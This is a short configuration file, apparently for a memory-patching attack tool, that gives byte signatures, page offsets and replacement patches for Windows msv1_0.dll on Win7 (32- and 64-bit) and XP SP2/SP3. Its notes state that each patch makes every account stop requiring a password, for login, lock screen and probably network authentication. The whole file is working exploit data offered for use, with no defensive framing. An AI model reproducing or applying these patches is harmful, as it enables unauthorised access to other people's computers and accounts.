# All values in hex
# Use ':' to separate patches for unlocks that need to patch several times

[Win7 32-bit msv1_0.dll technique]
notes=Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too!
signature=0x83F8107513B0018B
pageoffset=0x926
patch=0x83F8109090B0018B

[Win7 64-bit msv1_0.dll technique]
notes=Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too!
signature=0xC60F85C0B80000B8
pageoffset=0x926
patch=0xC6909090909090B8

[WinXP SP2 msv1_0.dll technique]
notes=Patches the call which decides if an account requires password authentication. This will cause all accounts to no longer require a password, which covers logging in, locking, and probably network authentication too! This is the best allround XPSP2 technique.
signature=0x8BFF558BEC83EC50A1
pageoffset=0x927
patch=0xB001

[WinXP SP3 msv1_0.dll technique]
notes=Patches the call which decides if an account requires password authentication. Page Offset signature changed from SP2.notes
signature=0x83F8107511B0018B
pageoffset=0x0862
patch=0x83F8109090B0018B